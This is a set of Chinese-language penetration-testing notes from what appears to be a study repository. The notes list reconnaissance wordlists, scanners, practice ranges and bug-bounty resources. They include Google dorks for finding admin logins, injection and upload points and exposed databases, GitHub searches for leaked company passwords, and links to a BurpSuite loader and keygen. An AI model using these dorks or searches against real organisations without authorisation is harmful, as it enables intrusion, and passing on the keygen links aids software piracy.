147 |   - top7000：<https://github.com/TheKingOfDuck/fuzzDicts/blob/master/directoryDicts/top7000.txt>
148 |   - 御剑字典：<https://github.com/gh0stkey/Web-Fuzzing-Box/tree/main/Dir/Yujian>
149 | - 相关工具：
150 |   - [dirsearch](https://github.com/maurosoria/dirsearch) 基于 Python 的目录扫描器，可以指定网站语言自定义字典
151 |   - [dirmap](https://github.com/H4ckForJob/dirmap)：一个高级web目录、文件扫描工具，功能将会强于DirBuster、Dirsearch、cansina、御剑
152 |   - [wfuzz](https://github.com/xmendez/wfuzz)：不仅可以用作目录扫描，可用于多种方式的的模糊扫描，功能比较强大
153 |   - [dirbuster](https://sourceforge.net/projects/dirbuster/)：OWASP开发的基于 Java 的图形化目录扫描器
154 |   - [7kbscan](https://github.com/7kbstorm/7kbscan-WebPathBrute/)：windows下的目录扫描器
155 | 
156 | 常规收集时使用 dirmap + dirsearch 做一次扫描即可，复杂FUZZ建议使用 wfuzz
157 | 
158 | ### WAF识别
159 | 
160 | - 相关工具：
161 |   - [wafw00f](https://github.com/EnableSecurity/wafw00f)
162 | 
163 | ```
164 | $   wafw00f https://example.org
165 | 
166 |                    ______
167 |                   /      \
168 |                  (  Woof! )
169 |                   \  ____/                      )
170 |                   ,,                           ) (_
171 |              .-. -    _______                 ( |__|
172 |             ()``; |==|_______)                .)|__|
173 |             / ('        /|\                  (  |__|
174 |         (  /  )        / | \                  . |__|
175 |          \(_)_))      /  |  \                   |__|
176 | 
177 |                     ~ WAFW00F : v2.2.0 ~
178 |     The Web Application Firewall Fingerprinting Toolkit
179 | 
180 | [*] Checking https://example.org
181 | [+] The site https://example.org is behind Edgecast (Verizon Digital Media) WAF.
182 | [~] Number of requests: 2
183 | ```
184 | 
185 | ## 敏感信息收集
186 | 
187 | - 相关工具
188 |   - [Hae](https://github.com/gh0stkey/HaE)
189 |     - HaE是基于 BurpSuite Java插件API 开发的请求高亮标记与信息提取的辅助型框架式插件，该插件可以通过自定义正则的方式匹配响应报文或请求报文，并对满足正则匹配的报文进行信息高亮与提取。
190 | 
191 | ### 邮件信息收集
192 | 
193 | - Github 邮件泄漏
194 |   site:"company" smtp
195 |   site:"company" smtp @qq.com
196 |   site:"company" smtp @126.com
197 |   site:"company" smtp @163.com
198 |   site:"company" smtp @sina.com.cn
199 | - BurpSuite 插件辅助
200 |   - [knife](https://github.com/bit4woo/knife)
201 | 
202 | ### 搜索引擎敏感信息收集
203 | 
204 | - Google 语法
205 |   - <https://www.exploit-db.com/google-hacking-database> explot-db语法库
206 |   - <https://moekylin.github.io/GoogleHackingTool/> 简单谷歌语法
207 | 
208 | - 一些简单的例子
209 | 
210 |   ```
211 |   # 基础结构 指定某一站点
212 |   site:"edu.cn"
213 | 
214 |   # 登陆、后台
215 |   site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
216 |   site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
217 | 
218 |   # 可能存在的注入点
219 |   site:域名 inurl:aspx|jsp|php|asp
220 | 
221 |   # 上传点
222 |   site:域名 inurl:file|load|editor|Files
223 | 
224 |   # eweb编辑器
225 |   site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
226 | 
227 |   # 存在的数据库
228 |   site:域名 filetype:mdb|asp|#
229 | 
230 |   # 查看脚本类型
231 |   site:域名 filetype:asp/aspx/php/jsp
232 | 
233 |   # 迂回策略入侵
234 |   inurl:cms/data/templates/images/index/
235 |   ```
236 | 
237 | ### Github敏感信息收集
238 | 
239 | - Github 高级搜索
240 |   - <https://github.com/search/advanced>
241 |   - 常用语法
242 |     - `company password`
243 |     - `company username`
244 | 
245 | - 同类型平台
246 |   - [Gitlab](https://about.gitlab.com/)
247 |   - [Gitee](https://gitee.com/)
248 | 
249 | - 工具
250 |   - [GitDorker](https://github.com/obheda12/GitDorker)
251 |   - [gitdorks_go](https://github.com/damit5/gitdorks_go) - 解决了 GitDorker 访问速率限制问题
252 | 
253 | ### 端口信息收集
254 | 
255 | - 工具
256 |   - [masnmapscan](https://github.com/hellogoldsnakeman/masnmapscan-V1.0) - 一款用于资产探测的端口扫描工具。整合了masscan和nmap两款扫描器
257 | 
258 | ### 备份文件泄露
259 | 
260 | - 工具
261 |   - [JSFinder](https://github.com/Threezh1/JSFinder)
262 |   - [ihoneyBakFileScan](https://github.com/sry309/ihoneyBakFileScan)
263 |     - Usage: `python3 ihoneyBakFileScan.py -u http://example.com`
264 | 
265 | ### JS接口收集
266 | 
267 | - 工具
268 |   - <https://github.com/KathanP19/JSFScan.sh> 参考：[https://www.ddosi.org/b519/](https://www.ddosi.org/b519/#3%E5%8A%9F%E8%83%BD%E9%BD%90%E5%85%A8%E7%9A%84JavaScript%E8%87%AA%E5%8A%A8%E5%8C%96%E4%BE%A6%E6%9F%A5%EF%BC%88JSFScansh%EF%BC%89)
269 |   - [LinkFinder](https://github.com/GerbenJavado/LinkFinder)
270 | 
271 | ## 相关应用信息收集
272 | 
273 | ### 小程序/公众号收集
274 | 
275 | - <https://www.tianyancha.com/> 通过企业相关名称搜索，主要留意 菜单栏 经营状况-> 微信公众号
276 | 
277 | ### APP 收集
278 | 
279 | - <https://www.qimai.cn/> 通过搜索APP相关名称，主要留意开发者信息，收集方式灵活多变，多去点点看看，暂时没有系统的收集方式
280 |   - TIPS: 搜索安卓相关应用，在搜索结果右侧点击公司即可定位到所属公司的所有应用，如 <https://www.qimai.cn/company/product/id/270> 270 对应百度ID
281 | - AppStore IOS设备上的 AppStore 同样通过开发者信息查询其他程序
282 | 
283 | ![图 1](/@attachment/images/Security/Web安全/信息收集_1661733427720.png)
284 | 


--------------------------------------------------------------------------------
/Security/信息收集/空间测绘.md:
--------------------------------------------------------------------------------
1 | # 空间测绘.md
2 | 
3 | - 空间测绘站
4 |   - 奇安信鹰图(Hunter): <https://hunter.qianxin.com/>
5 |   - FOFA: <https://fofa.info/>
6 |   - 钟馗之眼: <https://www.zoomeye.org/>


--------------------------------------------------------------------------------
/Security/安全工具/ExploitTools.md:
--------------------------------------------------------------------------------
 1 | # ExploitTools.md
 2 | 
 3 | ## metasploit
 4 | 
 5 | > 开源的安全漏洞检测工具
 6 | 
 7 | - 相关链接
 8 |   - Github仓库: <https://github.com/rapid7/metasploit-framework>
 9 |   - 官网地址: <https://www.metasploit.com/>
10 |   - 官网下载地址: <https://osx.metasploit.com/>
11 | - 使用示例
12 |   - macOS 下优雅的使用 Metasploit: <https://www.sqlsec.com/2019/11/macmsf.html>
13 | 
14 | ## searchsploit
15 | 
16 | > SearchSploit是一个用于搜索Exploit-DB漏洞数据的命令行工具，它可以允许你离线Exploit数据库，这样你就可以在本地执行离线搜索，这对于有时候不能联网的渗透工作非常的有用。
17 | 
18 | - 相关链接
19 |   - 官网地址: <https://www.exploit-db.com/searchsploit>
20 | - 使用示例
21 |   - 漏洞搜索工具-SearchSploit: <https://isbase.cc/article/searchsploit/script-1.html>
22 | 


--------------------------------------------------------------------------------
/Security/安全工具/ScanTools.md:
--------------------------------------------------------------------------------
  1 | # ScanTools.md
  2 | 
  3 | - [ScanTools.md](#scantoolsmd)
  4 |   - [目录扫描](#目录扫描)
  5 |     - [dirmap](#dirmap)
  6 |     - [dirsearch](#dirsearch)
  7 |   - [端口扫描](#端口扫描)
  8 |     - [Jfscan](#jfscan)
  9 |     - [masscan](#masscan)
 10 |   - [子域名扫描](#子域名扫描)
 11 |     - [ksubdomain](#ksubdomain)
 12 |     - [oneforall](#oneforall)
 13 |   - [漏洞扫描](#漏洞扫描)
 14 |     - [nucile](#nucile)
 15 |     - [xray](#xray)
 16 |   - [指纹扫描](#指纹扫描)
 17 |     - [observer_ward](#observer_ward)
 18 |   - [模糊测试](#模糊测试)
 19 |     - [wfuzz](#wfuzz)
 20 | 
 21 | ## 目录扫描
 22 | 
 23 | ### dirmap
 24 | 
 25 | > 一个高级web目录、文件扫描工具，功能将会强于DirBuster、Dirsearch、cansina、御剑。
 26 | 
 27 | - 相关链接
 28 |   - Github仓库: <https://github.com/H4ckForJob/dirmap>
 29 | - 使用示例
 30 |   - Github文档: <https://github.com/H4ckForJob/dirmap>
 31 | 
 32 | ### dirsearch
 33 | 
 34 | > 基于 Python 的 Web 目录扫描器
 35 | 
 36 | - 相关链接
 37 |   - 国光的 macOS 配置优化记录#dirsearch: <https://www.sqlsec.com/2019/12/macos.html#dirsearch>
 38 | - 使用示例
 39 |   - 使用Dirsearch探测Web目录: <https://www.cnblogs.com/qingchengzi/articles/12652232.html>
 40 | 
 41 | ## 端口扫描
 42 | 
 43 | ### Jfscan
 44 | 
 45 | > 基于Masscan和Nmap的极速端口扫描和服务发现工具 <>
 46 | 
 47 | - 相关链接
 48 |   - <https://github.com/nullt3r/jfscan>
 49 | - 使用示例
 50 |   - <https://www.freebuf.com/articles/network/332153.html>
 51 | 
 52 | ### masscan
 53 | 
 54 | > TCP端口扫描器 5分钟内扫描整个互联网
 55 | 
 56 | - 相关链接
 57 |   - Github仓库: <https://github.com/robertdavidgraham/masscan>
 58 | - 使用示例
 59 |   - Masscan 最快的互联网IP端口扫描器: <https://www.cnblogs.com/hubin123/p/16517022.html>
 60 | 
 61 | ## 子域名扫描
 62 | 
 63 | ### ksubdomain
 64 | 
 65 | > 无状态子域名爆破工具
 66 | 
 67 | - 相关链接
 68 |   - Github仓库: <https://github.com/boy-hack/ksubdomain>
 69 | - 使用示例
 70 |   - Github仓库: <https://github.com/boy-hack/ksubdomain>
 71 | 
 72 | ### oneforall
 73 | 
 74 | > 功能强大的子域收集工具
 75 | 
 76 | - 相关链接
 77 |   - <https://github.com/shmilylty/OneForAll>
 78 | - 使用示例
 79 | 
 80 |   ```bash
 81 |   python3 oneforall.py --target example.com run
 82 |   python3 oneforall.py --targets ./example.txt run
 83 |   # Linux创建软链接
 84 |   echo 'alias oneforall="python3 [OneForAll路径]/oneforall.py"' >> ~/.zshrc
 85 |   ```
 86 | 
 87 | ## 漏洞扫描
 88 | 
 89 | ### nucile
 90 | 
 91 | > 漏洞扫描，批量检测，自定义POC <https://github.com/projectdiscovery/nuclei>
 92 | 
 93 | - 相关链接
 94 |   - 官方使用文档: <https://nuclei.projectdiscovery.io/templating-guide/protocols/http/>
 95 |   - README_CN: <https://github.com/projectdiscovery/nuclei/blob/master/README_CN.md>
 96 | - 使用示例
 97 |   - 编写POC或使用工具批量检测: <https://www.yuque.com/moekylin/blog/ps1d2p#lklfJ>
 98 |   - Nuclei新版README翻译及用法: <https://xdym11235.com/archives/nuclei.html>
 99 | 
100 | ### xray
101 | 
102 | > 一款完善的安全评估工具，支持常见 web 安全问题扫描和自定义 poc
103 | 
104 | - 相关链接
105 |   - Github仓库: <https://github.com/chaitin/xray>
106 | - 使用示例
107 |   - 一个 xray PoC 的编写全过程: <https://stack.chaitin.com/techblog/detail?id=55>
108 | 
109 | ## 指纹扫描
110 | 
111 | ### observer_ward
112 | 
113 | > 跨平台社区 网络 CMS 指纹识别工具
114 | 
115 | - 相关链接
116 |   - Github仓库: <https://github.com/0x727/ObserverWard>
117 |   - 指纹库：<https://0x727.github.io/FingerprintHub/web_fingerprint_v3.json>
118 |   - 插件压缩包：<https://github.com/0x727/FingerprintHub/releases/download/default/plugins.zip>
119 | - 使用示例
120 |   - 官方使用说明：<https://0x727.github.io/ObserverWard/>
121 | 
122 | ## 模糊测试
123 | 
124 | ### wfuzz
125 | 
126 | > 基于 Python 的目录、参数、接口模糊测试工具
127 | 
128 | - 相关链接
129 |   - Github仓库: <https://github.com/xmendez/wfuzz>
130 |   - mac安装pycurl方案: <https://segmentfault.com/q/1010000012674778>
131 |   - Python pip Could not fetch URL 解决方案: <https://blog.csdn.net/liulanba/article/details/115944889>
132 | - 使用示例
133 |   - Wfuzz详细指南|模糊测试工具使用方法: <https://www.ddosi.org/wfuzz-guide/>
134 |   - Wfuzz初上手: <https://gh0st.cn/archives/2018-10-28/1>
135 | 


--------------------------------------------------------------------------------
/Security/安全工具/TrafficTools.md:
--------------------------------------------------------------------------------
 1 | # TrafficTools.md
 2 | 
 3 | ## BurpSuite
 4 | 
 5 | ![Shortcut](/@attachment/images/安全工具/BurpSuite_1660992463972.png)
 6 | 
 7 | - 相关链接
 8 |   - 官方安装包: [Burp Suite Releases](https://portswigger.net/burp/releases)  
 9 |   - 加载器: [Loader](https://raw.githubusercontent.com/x-Ai/BurpSuite/main/BurpSuiteLoader.jar)  
10 |   - 注册机: [Keygen](https://raw.githubusercontent.com/x-Ai/BurpSuite/main/burp-keygen-scz.jar)
11 | - 使用示例
12 |   - 一些相见恨晚的BurpSuite插件推荐: <https://www.secpulse.com/archives/124527.html>
13 |   - BurpSuite快捷键: <https://zweilosec.gitbook.io/hackers-rest/web/burp-suite>
14 |   - burpsuite实战指南: <https://t0data.gitbooks.io/burpsuite/content/>
15 |   - 越权漏洞与autorize插件使用: <https://blog.csdn.net/weixin_45557138/article/details/120876168>
16 |   - Autorize插件的使用方法: <https://blog.csdn.net/weixin_50464560/article/details/120235909>
17 | 


--------------------------------------------------------------------------------
/Security/安全资源.md:
--------------------------------------------------------------------------------
 1 | # 安全资源.md
 2 | 
 3 | - [安全资源.md](#安全资源md)
 4 |   - [书籍资源](#书籍资源)
 5 |   - [文库资源](#文库资源)
 6 |   - [文章资源](#文章资源)
 7 |   - [靶场资源](#靶场资源)
 8 |     - [Web靶场](#web靶场)
 9 |     - [集成靶场](#集成靶场)
10 |     - [在线靶场](#在线靶场)
11 |   - [学习资源](#学习资源)
12 | 
13 | **免责声明**
14 | 
15 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
16 | 
17 | ---
18 | 
19 | ## 书籍资源
20 | 
21 | - 网络安全书籍推荐列表: <https://www.cnblogs.com/zer0black/p/3959886.html>
22 | - 信息安全从业者书单推荐: <https://github.com/riusksk/secbook>
23 | - 信息安全方面的书籍书籍: <https://github.com/olist213/Information_Security_Books>
24 | 
25 | ## 文库资源
26 | 
27 | - 漏洞库
28 |   - Wooyun历史漏洞：<https://wy.zone.ci/>
29 |   - PeiQi文库：<http://wiki.peiqi.tech/>
30 |   - 白阁漏洞库：<https://wiki.bylibrary.cn/>
31 | - 知识文库
32 |   - Wooyun Drops-1：<http://drop.zone.ci/>
33 |   - Wooyun Drops-2：<https://wooyun.kieran.top/>
34 |   - 狼队安全团队公开知识库：<https://wiki.wgpsec.org/knowledge/>
35 |   - 白阁知识库：<https://wiki.bylibrary.cn/知识库/CSRF跨站请求伪造/>
36 |   - FreeBuf知识大陆：<https://wiki.freebuf.com/tribal>
37 | 
38 | ## 文章资源
39 | 
40 | - 入门文章
41 |   - [新手入门二进制安全和网络渗透，该选哪个比较好？](https://www.helloworld.net/p/1017593511)
42 |   - [黑色渗透测试的一些姿势个人总结](https://github.com/spoock1024/web-security/blob/master/articles/pentest-summary.md)
43 |   - [对安全新人的建议-宝宝树](https://github.com/spoock1024/web-security/blob/master/articles/%E5%AF%B9%E5%AE%89%E5%85%A8%E6%96%B0%E4%BA%BA%E7%9A%84%E5%BB%BA%E8%AE%AE-%E5%AE%9D%E5%AE%9D%E6%A0%91.md)
44 |   - [Web渗透测试学习成长路线图](https://www.freebuf.com/articles/web/290855.html)
45 | 
46 | ## 靶场资源
47 | 
48 | ### Web靶场
49 | 
50 | - SQLinject（SQL注入）
51 |   - SQLi-Labs：<https://github.com/Audi-1/sqli-labs>
52 | - FileUpload（文件上传）
53 |   - Upload-Labs <https://github.com/c0ny1/upload-labs>
54 |   - upload-labs-docker：<https://github.com/sqlsec/upload-labs-docker>
55 |   - upload-labs开普勒安全团队魔改版V1.0：<https://github.com/admin360bug/upload-labs>
56 | - XSS（跨站脚本）
57 |   - XSS-Labs：<https://github.com/do0dl3/xss-labs>
58 |   - XSS-demo：<https://github.com/haozi/xss-demo>
59 | - Overall (综合靶场)
60 |   - DVWA: <https://github.com/digininja/DVWA>
61 |   - Pikachu: <https://github.com/zhuifengshaonianhanlu/pikachu>
62 | - CMS-Vuln (框架漏洞)
63 |   - Vulnapps: <http://vulapps.evalbug.com/>
64 | 
65 | ### 集成靶场
66 | 
67 | - Vulhub: <https://vulhub.org/> 主机综合渗透测试靶场
68 | - <https://github.com/fofapro/vulfocus> 基于docker 集成 Vulhub、Vulapps
69 | - <https://github.com/crow821/vulntarget> Web漏洞、主机漏洞、域漏洞、工控漏洞等
70 | 
71 | ### 在线靶场
72 | 
73 | - Acunetix web Vulnerability Scanner - 扫描工具 [AWVS](https://www.acunetix.com/) 提供测试的站点
74 |   - 首页：<http://www.vulnweb.com/>
75 |   - html5类型：<http://testhtml5.vulnweb.com>
76 |   - php类型：<http://testphp.vulnweb.com>
77 |   - asp类型：<http://testasp.vulnweb.com>
78 |   - aspnet类型：<http://testaspnet.vulnweb.com>
79 | - 其他提供测试的在线靶场
80 |   - webappsec：<http://zero.webappsecurity.com/>
81 |   - watchfire：<https://demo.testfire.net/>
82 | - 国外知名的一些靶场
83 |   - [HackTheBox](https://www.hackthebox.com/)
84 |   - [RootMe](https://www.root-me.org/)
85 |   - [TryHackMe](https://tryhackme.com/)
86 | 
87 | ## 学习资源
88 | 
89 | - 搜索引擎
90 |   - <https://www.cxymm.net/>
91 |   - <https://www.wekghi.com/>
92 |   - <http://www.lehuotuan.com/>
93 | - 面试相关
94 |   - 安全岗位面试题总结: <https://www.freebuf.com/articles/web/305218.html>
95 | - 暂未分类
96 | <https://paramatter.art/> - Top25-参数
97 | 


--------------------------------------------------------------------------------
/Security/漏洞赏金.md:
--------------------------------------------------------------------------------
 1 | # 漏洞赏金.md
 2 | 
 3 | - [漏洞赏金.md](#漏洞赏金md)
 4 |   - [相关案例](#相关案例)
 5 |     - [文章归档](#文章归档)
 6 |     - [自动化](#自动化)
 7 |     - [edusrc](#edusrc)
 8 |   - [相关技巧](#相关技巧)
 9 |   - [赏金平台](#赏金平台)
10 |   - [公开数据](#公开数据)
11 | 
12 | **免责声明**
13 | 
14 | - `维护网络安全，营造良好的网络环境，文章仅供参考学习，请勿使用文中技术于非法用途，使用者造成任何负面影响与本人无关。`
15 | 
16 | - 相关链接
17 |   - 在美国国防部漏洞赏金计划中排名第一黑客的学习方法：<https://www.ddosi.org/hackerone-us-dod/>
18 |   - 帮助你成为一名漏洞赏金猎人: <https://www.bugbountyhunter.com/>
19 | 
20 | ---
21 | 
22 | ## 相关案例
23 | 
24 | ### 文章归档
25 | 
26 | - 那些年挖过的SRC之我是捡漏王：<https://www.freebuf.com/vuls/198327.html>
27 | - 重生之我是赏金猎人系列：<https://github.com/J0o1ey/BountyHunterInChina>
28 | 
29 | ### 自动化
30 | 
31 | - 刷SRC经验之批量化扫描实践：<https://www.freebuf.com/sectool/176562.html>
32 | - 如何快速上榜公益SRC：<https://cloud.tencent.com/developer/article/1799928>
33 | - 记一次公益SRC上分思路：<https://www.yuque.com/moekylin/blog/ps1d2p>
34 | 
35 | ### edusrc
36 | 
37 | - 记一次edusrc密码重置挖掘发现的通用漏洞: <https://blog.ainiyun.cn/websafe/100.html> - 逻辑漏洞
38 | - 获取edusrc证书的小窍门: <https://www.cxymm.net/article/qq_53101392/125126482> - 小程序入手
39 | - 十五分钟水edusrc证书: <https://www.cxymm.net/article/weixin_52961098/126302209> - 信息泄漏
40 | - 小白快速入门src挖掘 (以edusrc平台为例: <https://forum.90sec.com/t/topic/2069> - 信息收集与框架漏洞
41 | - 我的edu.SRC挖掘日常: <http://www.hackdig.com/11/hack-186840.htm> - 信息收集与逻辑漏洞
42 | - 记一次从信息泄露到密码重置挖掘思路: <https://www.adminxe.com/596.html> - 信息收集 -> 逻辑漏洞
43 | - 渗透实战之教育SRC挖掘经验: <https://blog.csdn.net/m0_59991869/article/details/120723298> - 信息搜集的广度决定了攻击的广度，知识面的广度决定了攻击的深度。
44 | 
45 | ## 相关技巧
46 | 
47 | - 漏洞盒子
48 |   - 漏洞提交标题：厂商+漏洞完整说明
49 |   - 漏洞复现：必须附带漏洞证明截图
50 | - 补天
51 |   - 公益漏洞条件：百度权重/移动权重>=1，或者Google权重>=3
52 |   - [关于补天SRC小白入门详细介绍](https://blog.csdn.net/qq_37113223/article/details/111916474)
53 | 
54 | ## 赏金平台
55 | 
56 | - 国内应急响应中心
57 |   - [SRCs|安全应急响应中心](http://0xsafe.org/index.html) 各个互联网厂商的安全应急响应中心暨漏洞提交平台
58 |   - [字节跳动安全应急响应中心](https://security.bytedance.com/) 今日头条、抖音、西瓜视频、皮皮虾、番茄小说、轻颜相机等
59 |   - [火线安全平台](https://www.huoxian.cn/project/list) 美团、嘀嗒出行、Keep、知乎等
60 |   - [快手安全应急响应中心](https://security.kuaishou.com/)
61 |   - [补天互联网漏洞响应平台](https://www.butian.net/)
62 |   - [漏洞盒子安全众测平台](https://www.vulbox.com/)
63 | 
64 | ## 公开数据
65 | 
66 | - 公开数据
67 |   - HackOne：<https://github.com/ARPSyndicate/bug-bounty-recon-dataset>
68 |   - 补天：<https://github.com/LangziFun/BuTian_Spider>
69 | - 公开报告
70 |   - <https://pentester.land/list-of-bug-bounty-writeups.html>
71 |   - <https://wy.zone.ci/bugs.php>


--------------------------------------------------------------------------------